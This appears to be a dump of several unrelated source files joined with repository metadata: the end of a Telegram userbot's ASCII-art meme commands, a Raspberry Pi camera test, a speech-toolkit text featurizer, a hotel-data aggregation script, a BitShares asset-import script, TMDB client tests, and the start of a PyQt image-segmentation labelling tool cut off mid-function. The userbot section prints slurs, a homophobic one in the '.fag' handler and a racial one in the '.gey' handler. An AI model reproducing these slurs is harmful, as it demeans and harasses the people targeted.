"`\n▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ `")
@register(outgoing=True, pattern="^.lol$")
async def lol_ascii(e):  # renamed from lol to avoid redefining the "-_-" handler above
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╱┏┓╱╱╱╭━━━╮┏┓╱╱╱╱ `"
"`\n╱┃┃╱╱╱┃╭━╮┃┃┃╱╱╱╱ `"
"`\n╱┃┗━━┓┃╰━╯┃┃┗━━┓╱ `"
"`\n╱┗━━━┛╰━━━╯┗━━━┛╱ `")
@register(outgoing=True, pattern="^.lool$")
async def lool(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n╭╭━━━╮╮┈┈┈┈┈┈┈┈┈┈\n┈┃╭━━╯┈┈┈┈▕╲▂▂╱▏┈\n┈┃┃╱▔▔▔▔▔▔▔▏╱▋▋╮┈`"
"`\n┈┃╰▏┃╱╭╮┃╱╱▏╱╱▆┃┈\n┈╰━▏┗━╰╯┗━╱╱╱╰┻┫┈\n┈┈┈▏┏┳━━━━▏┏┳━━╯┈`"
"`\n┈┈┈▏┃┃┈┈┈┈▏┃┃┈┈┈┈ `")
@register(outgoing=True, pattern="^.stfu$")
async def stfu(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n██████████████████████████████`"
"`\n██▀▀▀▀████▀▀▀▀████▀▀▀▀▀███▀▀██▀▀█`"
"`\n█──────██──────██───────██──██──█`"
"`\n█──██▄▄████──████──███▄▄██──██──█`"
"`\n█▄────▀████──████────█████──██──█`"
"`\n█▀▀██──████──████──███████──██──█`"
"`\n█──────████──████──███████──────█`"
"`\n██▄▄▄▄█████▄▄████▄▄████████▄▄▄▄██`"
"`\n█████████████████████████████████`")
@register(outgoing=True, pattern="^.gtfo$")
async def gtfo(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n███████████████████████████████ `"
"`\n█▀▀▀▀▀▀▀█▀▀▀▀▀▀█▀▀▀▀▀▀▀█▀▀▀▀▀▀█ `"
"`\n█───────█──────█───────█──────█ `"
"`\n█──███──███──███──███▄▄█──██──█ `"
"`\n█──███▄▄███──███─────███──██──█ `"
"`\n█──██───███──███──██████──██──█ `"
"`\n█──▀▀▀──███──███──██████──────█ `"
"`\n█▄▄▄▄▄▄▄███▄▄███▄▄██████▄▄▄▄▄▄█ `"
"`\n███████████████████████████████ `")
@register(outgoing=True, pattern="^.nih$")
async def nih(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n(\_/)`"
"`\n( •_•)`"
"\n >🌹 *ini buat kamu"
"`\n `"
"`\n(\_/)`"
"`\n( •_•)`"
"`\n🌹<\ *tapi boong`")
@register(outgoing=True, pattern="^.fag$")
async def fag(e):  # renamed from gtfo to avoid redefining the .gtfo handler above
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n█████████`"
"`\n█▄█████▄█`"
"`\n█▼▼▼▼▼`"
"`\n█ STFU FAGGOT'S`"
"`\n█▲▲▲▲▲`"
"`\n█████████`"
"`\n ██ ██`")
@register(outgoing=True, pattern="^.taco$")
async def taco(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("\n{\__/}"
"\n(●_●)"
"\n( >🌮 Want a taco?")
@register(outgoing=True, pattern="^.paw$")
async def paw(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
        await e.edit("`(=ↀωↀ=)`")
@register(outgoing=True, pattern="^.tf$")
async def tf(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿)̄ ")
@register(outgoing=True, pattern="^.gey$")
async def gey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈NIGGA U GEY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.gay$")
async def gay(e):  # renamed from gey to avoid redefining the .gey handler above
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈BAPAQ U GAY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.bot$")
async def bot(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("` \n ╲╲╭━━━━╮ \n╭╮┃▆┈┈▆┃╭╮ \n┃╰┫▽▽▽┣╯┃ \n╰━┫△△△┣━╯`"
"`\n╲╲┃┈┈┈┈┃ \n╲╲┃┈┏┓┈┃ `")
@register(outgoing=True, pattern="^.hey$")
async def hey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("\n┈┈┈╱▔▔▔▔╲┈╭━━━━━\n┈┈▕▂▂▂▂▂▂▏┃HEY!┊😀`"
"`\n┈┈▕▔▇▔▔┳▔▏╰┳╮HEY!┊\n┈┈▕╭━╰╯━╮▏━╯╰━━━\n╱▔▔▏▅▅▅▅▕▔▔╲┈┈┈┈`"
"`\n▏┈┈╲▂▂▂▂╱┈┈┈▏┈┈┈`")
@register(outgoing=True, pattern="^.nou$")
async def nou(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈╭╮╭╮\n┈┃┃┃┃\n╭┻┗┻┗╮`"
"`\n┃┈▋┈▋┃\n┃┈╭▋━╮━╮\n┃┈┈╭╰╯╰╯╮`"
"`\n┫┈┈ NoU\n┃┈╰╰━━━━╯`"
"`\n┗━━┻━┛`")
CMD_HELP.update({
"memes":
".cowsay\
\nUsage: cow which says things.\
\n\n:/\
\nUsage: Check yourself ;)\
\n\n-_-\
\nUsage: Ok...\
\n\n;_;\
\nUsage: Like `-_-` but crying.\
\n\n.cp\
\nUsage: Copypasta the famous meme\
\n\n.vapor\
\nUsage: Vaporize everything!\
\n\n.str\
\nUsage: Stretch it.\
\n\n.10iq\
\nUsage: You retard !!\
\n\n.zal\
\nUsage: Invoke the feeling of chaos.\
\n\nOof\
\nUsage: Ooooof\
\n\n.fp\
\nUsage: Facepalm :P\
\n\n.moon\
\nUsage: kensar moon animation.\
\n\n.clock\
\nUsage: kensar clock animation.\
\n\n.hi\
\nUsage: Greet everyone!\
\n\n.coinflip <heads/tails>\
\nUsage: Flip a coin !!\
\n\n.owo\
\nUsage: UwU\
\n\n.react\
\nUsage: Make your userbot react to everything.\
\n\n.slap\
\nUsage: reply to slap them with random objects !!\
\n\n.cry\
\nUsage: y u du dis, i cri.\
\n\n.shg\
\nUsage: Shrug at it !!\
\n\n.run\
\nUsage: Let Me Run, run, RUNNN!\
\n\n.chase\
\nUsage: You better start running\
\n\n.metoo\
\nUsage: Haha yes\
\n\n.mock\
\nUsage: Do it and find the real fun.\
\n\n.clap\
\nUsage: Praise people!\
\n\n.f <emoji/character>\
\nUsage: Pay Respects.\
\n\n.bt\
\nUsage: Believe me, you will find this useful.\
\n\n.type\
\nUsage: Just a small command to make your keyboard become a typewriter!\
\n\n.lfy <query>\
\nUsage: Let me Google that for you real quick !!\
\n\n.decide [Alternates: (.yes, .no, .maybe)]\
\nUsage: Make a quick decision.\
\n\n.scam <action> <time>\
\n[Available Actions: (typing, contact, game, location, voice, round, video, photo, document, cancel)]\
\nUsage: Create fake chat actions, for fun. (Default action: typing)\
\n\n\nThanks to 🅱️ottom🅱️ext🅱️ot (@NotAMemeBot) for some of these."
})
| 28.581738
| 157
| 0.479054
|
d4d5a80e8050a8b63dac79712990961e7b7108d8
| 975
|
py
|
Python
|
tests/remote/unit/test_picamera.py
|
git-akihakune/pilapse
|
2e2cb99e074b5b234c3d8816d421e3d24909e2e6
|
[
"MIT"
] | null | null | null |
tests/remote/unit/test_picamera.py
|
git-akihakune/pilapse
|
2e2cb99e074b5b234c3d8816d421e3d24909e2e6
|
[
"MIT"
] | null | null | null |
tests/remote/unit/test_picamera.py
|
git-akihakune/pilapse
|
2e2cb99e074b5b234c3d8816d421e3d24909e2e6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from picamera.camera import PiCamera
import pytest
def take_picture(camera, workdir:str, image_name:str, res_x:int, res_y:int):
from time import sleep
from os import path
camera.resolution = (res_x, res_y)
# camera warm-up time
sleep(2)
camera.capture(path.join(workdir, image_name))
@pytest.mark.order(1)
def test_camera(numberOfTakes:int = 6, res_x:int = 3280, res_y:int = 2464):
import os
from shutil import rmtree
from picamera import PiCamera
# Make sure the previous test run does not
# affect the later ones
if os.path.isdir('/tmp/pilapse-test'):
rmtree('/tmp/pilapse-test', ignore_errors=True)
os.mkdir('/tmp/pilapse-test')
tempdir = '/tmp/pilapse-test'
camera = PiCamera()
# take several pictures to test multiple images
# taking ability
for picNum in range(numberOfTakes):
take_picture(camera, tempdir, str(picNum) + '.jpg', res_x, res_y)
| 25.657895
| 76
| 0.684103
|
7b3773c7d7a80e97e3315028be84be6042b7012e
| 6,458
|
py
|
Python
|
athena/data/text_featurizer.py
|
leixiaoning/athena-2
|
826c3bda241afd388e156bbefcd6ca2e8d88afc9
|
[
"Apache-2.0"
] | 1
|
2021-05-20T03:09:32.000Z
|
2021-05-20T03:09:32.000Z
|
athena/data/text_featurizer.py
|
leixiaoning/athena-2
|
826c3bda241afd388e156bbefcd6ca2e8d88afc9
|
[
"Apache-2.0"
] | null | null | null |
athena/data/text_featurizer.py
|
leixiaoning/athena-2
|
826c3bda241afd388e156bbefcd6ca2e8d88afc9
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li; Shuaijiang Zhao
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
""" Text featurizer """
import os
import re
import warnings
from collections import defaultdict
import sentencepiece as spm
import tensorflow as tf
from ..utils.hparam import register_and_parse_hparams
class Vocabulary:
""" Vocabulary
Interface::
        decode: Convert a list of ids back into a sentence
        encode: Convert a sentence into a list of ids, mapping unknown tokens to the <unk> index
"""
def __init__(self, vocab_file):
"""Initialize vocabulary.
Args:
vocab_file: Vocabulary file name.
"""
super().__init__()
if vocab_file is not None:
self.load_model(vocab_file)
def load_model(self, vocab_file):
""" load model"""
if vocab_file is None or not os.path.exists(vocab_file):
            warnings.warn(
                "[Warning] the vocab file {} does not exist; make sure you are "
                "generating it, otherwise you should check it!".format(vocab_file)
)
self.stoi = defaultdict(self._default_unk_index)
self.itos = defaultdict(self._default_unk_symbol)
self.space, self.unk = "<space>", "<unk>"
self.unk_index, self.max_index = 0, 0
with open(vocab_file, "r", encoding="utf-8") as vocab:
for line in vocab:
if line.startswith("#"):
continue
word, index = line.split()
index = int(index)
self.itos[index] = word
self.stoi[word] = index
if word == self.unk:
self.unk_index = index
if index > self.max_index:
self.max_index = index
        # special handling for the space token, which may be used in English datasets
if self.stoi[self.space] != self.unk_index:
self.stoi[" "] = self.stoi[self.space]
self.itos[self.stoi[self.space]] = " "
def _default_unk_index(self):
return self.unk_index
def _default_unk_symbol(self):
return self.unk
def __len__(self):
return self.max_index + 1
def decode(self, ids):
"""Convert a list of ids to a sentence."""
return "".join([self.itos[id] for id in ids])
def encode(self, sentence):
"""Convert a sentence to a list of ids, with special tokens added."""
return [self.stoi[token.lower()] for token in list(sentence.strip())]
def __call__(self, inputs):
if isinstance(inputs, list):
return self.decode(inputs)
elif isinstance(inputs, int):
return self.itos[inputs]
elif isinstance(inputs, str):
return self.encode(inputs)
else:
raise ValueError("unsupported input")
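# Minimal usage sketch (illustrative; the vocab file name and its contents are
# hypothetical). Assuming "vocab.txt" contains the lines "<unk> 0", "<space> 1",
# "a 2" and "b 3":
#
#     vocab = Vocabulary("vocab.txt")
#     vocab.encode("ab a")          # -> [2, 3, 1, 2]
#     vocab.decode([2, 3, 1, 2])    # -> "ab a"
#     vocab([2, 3])                 # __call__ dispatches on the input type -> "ab"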
class SentencePieceFeaturizer:
    """ SentencePiece featurizer, wrapping a sentencepiece model for subword encoding and decoding """
def __init__(self, spm_file):
self.unk_index = 0
self.sp = spm.SentencePieceProcessor()
if spm_file is not None:
self.sp.Load(spm_file)
def load_model(self, model_file):
""" load model """
self.sp.Load(model_file)
def __len__(self):
return self.sp.GetPieceSize()
def encode(self, sentence):
"""Convert a sentence to a list of ids by sentence piece model"""
sentence = sentence.upper()
return [self.sp.EncodeAsIds(sentence)]
    def decode(self, ids):
        """Convert a list of ids to a sentence"""
return self.sp.DecodeIds(ids)
class TextTokenizer:
""" Text Tokenizer """
def __init__(self, text=None):
self.tokenizer = tf.keras.preprocessing.text.Tokenizer()
self.text = text
if text is not None:
self.load_model(text)
def load_model(self, text):
""" load model """
self.tokenizer.fit_on_texts(text)
def __len__(self):
return len(self.tokenizer.word_index) + 1
def encode(self, texts):
"""Convert a sentence to a list of ids, with special tokens added."""
return self.tokenizer.texts_to_sequences([texts])[0]
    def decode(self, sequences):
        """Convert a list of ids to a sentence"""
return self.tokenizer.sequences_to_texts(sequences[0])
class TextFeaturizer:
""" The main text featurizer interface """
supported_model = {
"vocab": Vocabulary,
"spm": SentencePieceFeaturizer,
"text": TextTokenizer
}
default_config = {
"type": "text",
"model": None,
}
#pylint: disable=dangerous-default-value, no-member
def __init__(self, config=None):
self.p = register_and_parse_hparams(self.default_config, config)
self.model = self.supported_model[self.p.type](self.p.model)
self.punct_tokens = r"'{}[]\|`~@#$%^&*()"
self.punct_tokens += r"_+,。、‘’“”《》?:;【】——~!@"
self.punct_tokens += r"¥%……&(),.?<>:;\[\]|`\!@#$%^&()+?\"/_-"
def load_model(self, model_file):
""" load model """
self.model.load_model(model_file)
@property
def model_type(self):
""" the model type """
return self.p.type
def delete_punct(self, tokens):
""" delete punctuation tokens """
        # escape the set so characters like ']' do not terminate the character class early
        return re.sub("[{}]".format(re.escape(self.punct_tokens)), "", tokens)
def __len__(self):
return len(self.model)
def encode(self, texts):
"""Convert a sentence to a list of ids, with special tokens added."""
return self.model.encode(texts)
    def decode(self, sequences):
        """Convert a list of ids to a sentence"""
return self.model.decode(sequences)
@property
def unk_index(self):
""" return the unk index """
if self.p.type == "vocab":
return self.model.unk_index
return -1
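# Minimal usage sketch (illustrative; "my_vocab.txt" is a hypothetical path):
#
#     featurizer = TextFeaturizer({"type": "vocab", "model": "my_vocab.txt"})
#     ids = featurizer.encode("some text")   # list of token ids from the vocab
#     text = featurizer.decode(ids)          # back to a sentence
#
# With "type" set to "spm" or "text", the same encode/decode interface is served
# by SentencePieceFeaturizer or TextTokenizer respectively.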
| 31.970297
| 82
| 0.598328
|
c7cc5c9cdfcfbf14718205c8571bc6009b6cb42f
| 393
|
py
|
Python
|
preprocess/003_aggregation/04/python_awesome.py
|
liyiliuxingyu/Data-preprocessing-goes-from-getting-started-to-real-world
|
c83fc7b92b52bc106d9a803a6fec24d6470889c3
|
[
"BSD-3-Clause"
] | null | null | null |
preprocess/003_aggregation/04/python_awesome.py
|
liyiliuxingyu/Data-preprocessing-goes-from-getting-started-to-real-world
|
c83fc7b92b52bc106d9a803a6fec24d6470889c3
|
[
"BSD-3-Clause"
] | null | null | null |
preprocess/003_aggregation/04/python_awesome.py
|
liyiliuxingyu/Data-preprocessing-goes-from-getting-started-to-real-world
|
c83fc7b92b52bc106d9a803a6fec24d6470889c3
|
[
"BSD-3-Clause"
] | null | null | null |
from preprocess.load_data.data_loader import load_hotel_reserve
customer_tb, hotel_tb, reserve_tb = load_hotel_reserve()
# Content as published in the book follows
# Apply the var and std functions to the total_price column to compute the variance and standard deviation
result = reserve_tb \
.groupby('hotel_id') \
.agg({'total_price': ['var', 'std']}).reset_index()
result.columns = ['hotel_id', 'price_var', 'price_std']
# When a group contains only one record the variance and standard deviation become NaN, so replace them with 0 here
result.fillna(0, inplace=True)
| 30.230769
| 63
| 0.765903
|
92d227203915b7af458e29d6fcab2b0b2b5f9838
| 4,304
|
py
|
Python
|
postgres/import_assets.py
|
VinChain/vinchain-python-api-backend-
|
f18bbd78d27d23eea744f1fb9dea90a1b8a30396
|
[
"MIT"
] | 1
|
2021-03-17T00:11:02.000Z
|
2021-03-17T00:11:02.000Z
|
postgres/import_assets.py
|
VinChain/vinchain-python-api-backend
|
f18bbd78d27d23eea744f1fb9dea90a1b8a30396
|
[
"MIT"
] | null | null | null |
postgres/import_assets.py
|
VinChain/vinchain-python-api-backend
|
f18bbd78d27d23eea744f1fb9dea90a1b8a30396
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
import json
import psycopg2
from websocket import create_connection
import api
import config
ws = create_connection(config.WEBSOCKET_URL)
con = psycopg2.connect(**config.POSTGRES)
cur = con.cursor()
query = "TRUNCATE assets"
cur.execute(query)
query = "ALTER SEQUENCE assets_id_seq RESTART WITH 1;"
cur.execute(query)
# alter sequence of the ops once a day here
query = "DELETE FROM ops WHERE oid NOT IN (SELECT oid FROM ops ORDER BY oid DESC LIMIT 10);"
cur.execute(query)
for x in range(0, 10):
query = "UPDATE ops set oid=%s WHERE oid IN (SELECT oid FROM ops ORDER BY oid LIMIT 1 OFFSET %s);"
cur.execute(query, (x+1, x))
query = "ALTER SEQUENCE ops_oid_seq RESTART WITH 11;"
cur.execute(query)
con.commit()
if config.TESTNET == 1:
core_symbol = config.CORE_ASSET_SYMBOL_TESTNET
else:
core_symbol = config.CORE_ASSET_SYMBOL
all_assets = []
ws.send('{"id":1, "method":"call", "params":[0,"list_assets",["AAAAA", 100]]}')
result = ws.recv()
j = json.loads(result)
all_assets.append(j);
len_result = len(j["result"])
print len_result
#print all_assets
while len_result == 100:
ws.send('{"id":1, "method":"call", "params":[0,"list_assets",["'+j["result"][99]["symbol"]+'", 100]]}')
result = ws.recv()
j = json.loads(result)
len_result = len(j["result"])
all_assets.append(j);
for x in range(0, len(all_assets)):
size = len(all_assets[x]["result"])
print size
for i in range(0, size):
symbol = all_assets[x]["result"][i]["symbol"]
asset_id = all_assets[x]["result"][i]["id"]
precision = 5
try:
data3 = api._get_asset(asset_id)
current_supply = data3[0]["current_supply"]
precision = data3[0]["precision"]
# print current_supply
except:
price = 0
continue
try:
holders = api._get_asset_holders_count(asset_id)
# print holders
except:
holders = 0
continue
if symbol == core_symbol:
type_ = "Core Token"
elif all_assets[x]["result"][i]["issuer"] == "1.2.0":
type_ = "SmartCoin"
else:
type_ = "User Issued"
#print all_assets[x]["result"][i]
try:
data = api._get_volume(core_symbol, symbol)
except:
continue
#print symbol
#print data["quote_volume"]
try:
data2 = api._get_ticker(core_symbol, symbol)
price = data2["latest"]
#print price
if str(price) == 'inf':
continue
# exit
#print price
except:
price = 0
continue
mcap = int(current_supply) * float(price)
query = "INSERT INTO assets (aname, aid, price, volume, mcap, type, current_supply, holders, wallettype, precision) VALUES({})".format(', '.join(('%s',)*10))
print(symbol)
cur.execute(query, (symbol, asset_id, price, data['base_volume'], str(mcap), type_, str(current_supply), str(holders), '', str(precision)))
con.commit()
# with updated volume, add stats
query = "select sum(volume) from assets WHERE aname!='BTS'"
cur.execute(query)
results = cur.fetchone()
volume = results[0]
if volume is None:
volume = 0
query = "select sum(mcap) from assets"
cur.execute(query)
results = cur.fetchone()
market_cap = results[0]
query = "INSERT INTO stats (type, value, date) VALUES('volume_bts', %s, NOW())"
print query
cur.execute(query, (str(int(round(volume))),))
con.commit()
"""query = "INSERT INTO stats (type, value, date) VALUES('market_cap_bts', '"+str(int(round(market_cap)))+"', NOW())" # out of range for bigint, fix.
print query
cur.execute(query)
con.commit()
"""
# insert core token manually
data3 = api._get_asset(config.CORE_ASSET_ID)
current_supply = data3[0]["current_supply"]
holders = api._get_asset_holders_count(config.CORE_ASSET_ID)
mcap = int(current_supply)
query = "INSERT INTO assets (aname, aid, price, volume, mcap, type, current_supply, holders, wallettype) VALUES('BTS', '1.3.0', '1', %s, %s, %s, %s, %s, %s)"
cur.execute(query, (str(volume), str(mcap), 'Core Token', str(current_supply), str(holders), ''))
con.commit()
cur.close()
con.close()
| 26.9
| 165
| 0.622212
|
4d87bd234e6cbfa3787b8375b2d98f02abc0b916
| 2,837
|
py
|
Python
|
tests/test_tmdb.py
|
SztMar/movies_catalogue
|
8140a37e916d9f67314aa679b46134e1794588e6
|
[
"MIT"
] | null | null | null |
tests/test_tmdb.py
|
SztMar/movies_catalogue
|
8140a37e916d9f67314aa679b46134e1794588e6
|
[
"MIT"
] | null | null | null |
tests/test_tmdb.py
|
SztMar/movies_catalogue
|
8140a37e916d9f67314aa679b46134e1794588e6
|
[
"MIT"
] | null | null | null |
import tmdb_client
from unittest.mock import Mock
import app
from app import app
import pytest
test_list = "top_rated"
def test_get_poster_url_uses_default_size():
    # Prepare the test data
poster_api_path = "some-poster-path"
expected_default_size = 'w324'
    # Call the code under test
poster_url = tmdb_client.get_poster_url(poster_api_path=poster_api_path)
    # Compare the results
assert expected_default_size in poster_url
#assert poster_url == "https://image.tmdb.org/t/p/w324/some-poster-path"
def test_get_movies_list(monkeypatch):
    # The list that the mocked "API request" will return
mock_movies_list = ['Movie 1', 'Movie 2']
requests_mock = Mock()
    # The result of calling the API request
response = requests_mock.return_value
    # Mock the return value of the .json() method call
response.json.return_value = mock_movies_list
monkeypatch.setattr("tmdb_client.requests.get", requests_mock)
movies_list = tmdb_client.get_movies_list(list_type="popular")
assert movies_list == mock_movies_list
def test_get_single_movie_id(monkeypatch):
mock_movie_id = 1
requests_mock = Mock()
response = requests_mock.return_value
response.json.return_value = mock_movie_id
monkeypatch.setattr("tmdb_client.requests.get", requests_mock)
movie_id = tmdb_client.get_single_movie(movie_id=1)
assert movie_id == mock_movie_id
def test_get_movie_images_id(monkeypatch):
mock_movie_id = 1
requests_mock = Mock()
response = requests_mock.return_value
response.json.return_value = mock_movie_id
monkeypatch.setattr("tmdb_client.requests.get", requests_mock)
movie_id = tmdb_client.get_movie_images(movie_id=1)
assert movie_id == mock_movie_id
def test_get_single_movie_cast_id(monkeypatch):
mock_movie_id = 1
requests_mock = Mock()
response = requests_mock.return_value
response.json.return_value = mock_movie_id
monkeypatch.setattr("tmdb_client.requests.get", requests_mock)
movie_id = tmdb_client.get_single_movie(movie_id=1)
assert movie_id == mock_movie_id
def test_get_movies_by_default_movies():
    # Prepare the test data
how_many = 1
adult = False
    # Call the code under test
data = tmdb_client.get_movies(how_many= how_many, list_type="upcoming")
assert data[0]['adult'] == adult
@pytest.mark.parametrize("test_input",['now_playing', 'popular','top_rated', 'upcoming'])
def test_homepage_movie_list(monkeypatch, test_input):
api_mock = Mock()
api_mock.return_value={'results': []}
monkeypatch.setattr("tmdb_client.call_tmdb_api", api_mock)
with app.test_client() as client:
print(test_input)
response = client.get(f'/?list_type={test_input}')
assert response.status_code == 200
api_mock.assert_called_once_with(f'movie/{test_input}')
| 31.876404
| 89
| 0.756433
|
f0e098d6f46b56d549a10aa011fbf225c44dbef7
| 26,718
|
py
|
Python
|
CutUI.py
|
jfzhang95/simple-labelme
|
e4a831e56924cde70ee1293dc53e1dd298025051
|
[
"MIT"
] | null | null | null |
CutUI.py
|
jfzhang95/simple-labelme
|
e4a831e56924cde70ee1293dc53e1dd298025051
|
[
"MIT"
] | null | null | null |
CutUI.py
|
jfzhang95/simple-labelme
|
e4a831e56924cde70ee1293dc53e1dd298025051
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import os
import numpy as np
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import cv2
from GraphCut import GraphMaker
from PIL import Image
from DEXTR import utils
import torch
from collections import OrderedDict
from DEXTR import deeplab_resnet as resnet
from torch.nn.functional import upsample
from torch.autograd import Variable
from mypath import Path
class CutUI(QWidget):
def __init__(self, image_dir=None, result_dir=None, mode='dextr'):
super().__init__()
self.image_dir = image_dir
self.result_dir = result_dir
path = self.result_dir
if not os.path.exists(path):
os.mkdir(path)
file_list = os.listdir(self.image_dir)
self.images = file_list
self.image_name = self.images[0]
self.id = 0
self.lenths = len(file_list) - 1
self.mode = mode
self.gpu_id = -1
self.pad = 50
self.thres = 0.8
self.modelName = 'dextr_pascal-sbd'
self.image = cv2.imread(os.path.join(self.image_dir,self.image_name))
self.overlay = np.zeros_like(self.image)
self.segment_overlay = np.zeros_like(self.image)
self.temp_overlay = np.zeros_like(self.image)
self.extreme_points_ori = []
self.dextr_results = []
self.completed_image_list = []
self.seed_type = 1
self.seedStartX = 0
self.seedStartY = 0
self.seedReleaseX = 0
self.seedReleaseY = 0
self.IsEraser = False
self.IsAdd = False
self.flag = True
self.__InitUI()
if self.mode == 'graphcut':
print('Using GRAPH CUT')
self.graphcutButton.setStyleSheet("background-color:gray")
self.dextrButton.setStyleSheet("background-color:white")
elif self.mode == 'dextr':
print('Using DEXTR CUT')
self.graphcutButton.setStyleSheet("background-color:white")
self.dextrButton.setStyleSheet("background-color:gray")
def __InitUI(self):
self.graphcutButton = QPushButton("Graphcut")
self.graphcutButton.setStyleSheet("background-color:white")
self.graphcutButton.clicked.connect(self.on_graphcut)
self.dextrButton = QPushButton("DEXTR")
self.dextrButton.setStyleSheet("background-color:white")
self.dextrButton.clicked.connect(self.on_dextr)
segmentButton = QPushButton("Segmentation")
segmentButton.setStyleSheet("background-color:white")
segmentButton.clicked.connect(self.on_segment)
finishButton = QPushButton("Finish")
finishButton.setStyleSheet("background-color:white")
finishButton.clicked.connect(self.on_finish)
nextButton = QPushButton("Next")
nextButton.setStyleSheet("background-color:white")
nextButton.clicked.connect(self.on_next)
lastButton = QPushButton("Last")
lastButton.setStyleSheet("background-color:white")
lastButton.clicked.connect(self.on_last)
self.thinkness = QLineEdit("3")
self.thinkness.setStyleSheet("background-color:white")
self.thinkness.setMaximumWidth(30)
clearButton = QPushButton("Clear All")
clearButton.setStyleSheet("background-color:white")
clearButton.clicked.connect(self.on_clear)
self.eraserButton = QPushButton("Eraser")
self.eraserButton.setStyleSheet("background-color:white")
self.eraserButton.clicked.connect(self.on_eraser)
self.addButton = QPushButton("Add")
self.addButton.setStyleSheet("background-color:white")
self.addButton.clicked.connect(self.on_add)
hbox = QHBoxLayout()
hbox.addWidget(self.dextrButton)
hbox.addWidget(self.graphcutButton)
hbox.addWidget(segmentButton)
hbox.addWidget(self.addButton)
hbox.addWidget(self.eraserButton)
hbox.addWidget(clearButton)
hbox.addWidget(finishButton)
hbox.addWidget(lastButton)
hbox.addWidget(nextButton)
hbox.addWidget(self.thinkness)
hbox.addStretch(1)
self.seedLabel = QLabel()
self.seedLabel.mousePressEvent = self.mouse_down
self.seedLabel.mouseReleaseEvent = self.mouse_release
self.seedLabel.mouseMoveEvent = self.mouse_drag
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
imagebox = QHBoxLayout()
imagebox.addWidget(self.seedLabel)
vbox = QVBoxLayout()
vbox.addLayout(hbox)
vbox.addLayout(imagebox)
vbox.addStretch()
self.setLayout(vbox)
self.setWindowTitle('Segmentation')
self.show()
@staticmethod
def get_qimage(cvimage):
height, width, bytes_per_pix = cvimage.shape
bytes_per_line = width * bytes_per_pix
cv2.cvtColor(cvimage, cv2.COLOR_BGR2RGB, cvimage)
return QImage(cvimage.data, width, height, bytes_per_line, QImage.Format_RGB888)
def mouse_down(self, event):
thinkness = int(self.thinkness.text())
if event.button() == Qt.LeftButton:
self.seed_type = 1
elif event.button() == Qt.RightButton:
self.seed_type = 0
temp_overlay = self.get_image_with_overlay()
self.seedStartX = event.x()
self.seedStartY = event.y()
self.seedReleaseX = event.x()
self.seedReleaseY = event.y()
if self.mode == 'graphcut':
if not self.IsAdd and not self.IsEraser:
if self.seed_type == 1:
cv2.circle(temp_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (255, 255, 255),
int(thinkness / 2)) #
else:
cv2.circle(temp_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (0, 0, 255),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(temp_overlay)))
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
print('You cannot wipe any pixels until you finish at least one segmentation!')
else:
cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (0, 0, 0),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
print('You cannot add any pixels until you finish at least one segmentation!')
else:
